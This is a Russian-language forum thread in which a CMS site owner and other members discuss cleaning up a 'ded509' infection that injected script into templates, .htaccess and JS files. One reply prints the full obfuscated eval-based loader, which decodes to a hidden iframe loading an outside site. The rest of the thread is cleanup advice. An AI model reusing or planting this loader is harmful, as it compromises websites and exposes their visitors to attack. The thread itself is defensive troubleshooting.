ded509 script

 
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
Доброго времени суток. Никто не сталкивался с кодом во всех tpl с комментарием ded509? Нашел информацию, что это код спам рассылки. Почистил все tpl и закралось у меня скудное сомнение, что не все так просто, что где-то еще он есть.
Если кто-то сталкивался подскажите где еще искать и как бороться дабы не было больше такого случая.
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
Так же нашел код в htaccess
Реклама
cms
Посетитель
small user social cms
Медаль
Сообщений: 131
Еще эта пакость обитает в .js и .jpg Пройдись поиском по всем файлам, ища конкретно эту запись в содержимом и увидевший где наследил. Надеюсь пароли ты уже сменил?
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
Aloha, картинки не нашел, 2 js точно сменил 3 или 4 htaccess все tpl. Писали на форумах, что и php прячется, но там не нашел. Буду копать дальше. Пароли сменил после того как вычистил БУК. Если найду еще отпишусь.
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
Aloha, это просто п***ц все js заляпал. Почти весь сайт чистить надо.
Посетитель
small user social cms
МедальКубок зрительских симпатий
Сообщений: 754
Boffka:
Никто не сталкивался с кодом во всех tpl с комментарием ded509
Это уже последствия заражения.Понятно что никаких коментов <!--ded509--> в шаблонах и быть не должно.
Вам внедрили в js исполняемый eval код , обработанный обфускатором.Последстия самые не предсказуемые.
Лечить? Снести и поставить заново , и базу просканировать на наличие скриптов в теле статей , и прочего контента.
Внедренный код h t t p:/ / anthu.com/thu4/
Код PHP:
  1. <!--ded509--><script type="text/javascript" language="javascript" e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!7d!66!75!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!7d!66!75!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!6b!7a!67!70!6e!72!66!67!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42!25!2c!66!67!78!74!71!7a!79!6a!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!67!74!77!69!6a!77!25!42!25!2c!35!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!6d!6a!6e!6c!6d!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!7c!6e!69!79!6d!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!71!6a!6b!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!79!74!75!25!42!25!2c!36!75!7d!2c!40!12!f!12!f!25!25!25!25!6e!6b!25!2d!26!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!7d!66!75!2c!2e!2e!25!80!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!7c!77!6e!79!6a!2d!2c!41!69!6e!7b!25!6e!69!42!61!2c!7d!66!75!61!2c!43!41!34!69!6e!7b!43!2c!2e!40!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!7d!66!75!2c!2e!33!66!75!75!6a!73!69!48!6d!6e!71!69!2d!7d!66!75!2e!40!12!f!25!25!25!25!82!12!f!82!2e!2d!2e!40".split(a2);s="";for(i=0;i<z.length;i++){s+=String.fromCharCode(e(v+(z[i]))-5);}zaz=s;e(zaz);}</script><!--/ded509-->
PS//Мое бредовое рассуждение.
Теоретически могут быть проблемы с подменой кода цвета , не исключено что внедрение может произойти через подмену кода палитры DED509 , приводящую к определенной ошибке и возможности внедрить чужеродный код.
Но тогда почему именно этот код цвета а не любой другой?
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
oll, почему именно сам ХЗ. Проверил на сервисах теперь все чисто если им верить. Жду ответа от платона. Некоторые сервисы показали, что есть скрытые iframe сейчас займусь их поиском. Вот они скорее всего и будут в статьях
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
Проверил базу вроде чисто. На iframe одно совпадение в блогах пользователь вставлял видео. По ded ничего не найдено. Возможно я немного с кривыми руками. oll, если не сложно как сканить базу?
Посетитель
small user social cms
МедальКубок зрительских симпатий
Сообщений: 754
Boffka:
iframe
В самом инстанте нет ни одного фрейма.Поэтому все что касаеться проколов, то это личные наработки вашего шаблона и сторонних разработок для вашего сайта.
Вот поэтому проблема малозначительна.Кто знает о нерешенной проблеме использования iframe , тот и спокоен.
Анализируй код на наличие iframe
Модуль враппер, что аналогичное установлено.Делаеться двумя движениями .
На локал хосте ставиш копию сайта. на второй домен копию дистрибутива инстанта. Запуск программы смерживания файлов.WinMerge или аналогичные, я пользуюсь лицензионной Araxis Merge. По отличию файлов все видно.
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
oll, спасибо за подсказку. Позже отпишусь по результату
Посетитель
small user social cms
МедальКубок зрительских симпатий
Сообщений: 754
Потом пожалуйста перед закрыванием темы, сделай красивый жест.
Отпишись о наработках по устранению таких проблем.
З...Последнее время только и видиш ЭГОПОСТУПКИ.
Тема закрыта всем спасибо.
Редактировалось: 1 раз (Последний: 15 апреля 2013 в 15:41)
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
oll, ок не вопрос
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
И так, что было сделано:
- Заменены все файлы htaccess
- Полная проверка всех файлов tpl и чистка их от вредоноснного кода так как все были заражены
- Полная замена папки admin все .js были заражены
- Замена всех файлов в папке includes так же все .js заражены
- Замена mod_rewrite
- Удалил все загруженные картинки на дату заражения
- iframe так и небыли мной обнаружены
- Обязательно проверьте папки шаблонов так как я там встретил htaccess которые там не должны были быть.

Ребята если сказать честно, лечиться полной заменой движка. Такой объем заразы я встретил в первые.

Тему до вечера не закрываю. Возможно еще дополню.
Посетитель
small user social cms
МедальКубок зрительских симпатий
Сообщений: 754
Не удивительно что ты первороходец.Я кинула по вскидке на поиск DED509 результат выдачи в основном это код палитры цвета.И единственный ресурс начала заражения приведен выше.
В вашем случае ( это надо всем кто сдесь живет)видимо надо постоянно описывать происходящие события ,а решения будут принимать по мере их поступления
Посетитель
small user social cms
Кубок зрительских симпатийМедаль
Сообщений: 214
oll, сейчас снова проверял файлы и снова вылазят зараженные и именно те которые я чистил еще утром. Не могу понять в чем причина повторного заражения. Думаю написать хостеру и узнать, что-нибудь у них.
В начало страницы
Предыдущая темаСледующая тема Перейти на форум: